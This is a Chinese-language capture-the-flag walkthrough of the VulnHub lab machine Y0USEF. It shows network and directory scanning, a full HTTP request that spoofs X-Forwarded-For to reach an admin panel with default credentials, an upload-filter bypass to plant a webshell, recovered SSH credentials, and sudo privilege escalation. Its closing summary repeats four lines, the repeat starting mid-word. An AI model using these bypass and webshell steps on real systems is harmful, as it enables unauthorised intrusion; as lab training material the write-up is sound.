声明
好好学习,天天向上
搭建
Y0USEF: 1,vulnhub官网下载完镜像后,最开始搭建时,导入vmware屡屡出错,改了ovftool,以及各种配置还是无法导入,最后下载Oracle VM Virtrualbox,导入到这个里面,网络设置成桥接网卡,可以正常使用
渗透
存活扫描
nmap -sP 192.168.31.1/24
端口扫描
nmap -T4 -A 192.168.31.232 -p 1-65535 -oN nmap.A
发现开启22和80,看看80的http
访问80,啥都没有
http://192.168.31.232
dirsearch扫描以下目录吧
python3 dirsearch.py -u "http://192.168.31.232" -e *
看到几个有价值的目录
依次试试,都没有正常显示
只能进行一波源码审计了,需要通过POST,x-forwarded-for: 127.0.0.1,传递username和password参数,并且用户名和密码都是admin,
试一下,通过BP构造,我这里就是访问adminstration后,直接抓包,改了方法为POST,加了x-forwarded-for: 127.0.0.1,加了username和password参数,剩下都没变,cookie也不要动
POST /adminstration/ HTTP/1.1
Host: 192.168.31.232
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
x-forwarded-for: 127.0.0.1
Cookie: PHPSESSID=2s2560163ks1k53cj1aoni0b03
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
username=admin&password=admin
这个重放是测试,可以这么传参,我们用的时候,就是在Proxy里面加上参数直接转发,要不然跳转不了
转发请求后,看到上传页面
上传文件拿shell,这里需要一个小小的绕过,只需要content-type是图片属性就行,所以我修改Content-Type: image/png
上传成功
扫描到adminstration下的目录,发现upload目录,一层一层扫描,发现了我的冰蝎马
访问
http://192.168.31.232/adminstration/upload/files/16092954691.php
冰蝎连接,静候一会,等太久了,直接用一句话吧
拿到第一个flag,base64解密后,得到用户
yousef
yousef123
ssh连接
现在就是提权,用最简单的,sudo提权
sudo su
成功提权,拿到flag
You’ve got the root Congratulations any feedback content me twitter @y0usef_11
总结
端口扫描,发现22和80,优先从80攻击
攻击web,就是要拿到后台的权限,因为后台权限才最有可能上传木马,拿到一般的shell权限
攻击web就要知道后台的目录,就需要对目录进行扫描,想办法正常登录,爆破也好,绕过也好,这里相当于“作弊”,用的代码审计
拿下web权限后,就要想方设法上传木马拿下shell,各种绕过检测
拿下shell后,就需要维持权限,通过反连或者找一找机器上有没有用户名和密码信息,这个shell的权限一般都是www的
提权,最简单的sudo提权,输入自己的密码,就可以提到root
描,想办法正常登录,爆破也好,绕过也好,这里相当于“作弊”,用的代码审计
拿下web权限后,就要想方设法上传木马拿下shell,各种绕过检测
拿下shell后,就需要维持权限,通过反连或者找一找机器上有没有用户名和密码信息,这个shell的权限一般都是www的
提权,最简单的sudo提权,输入自己的密码,就可以提到root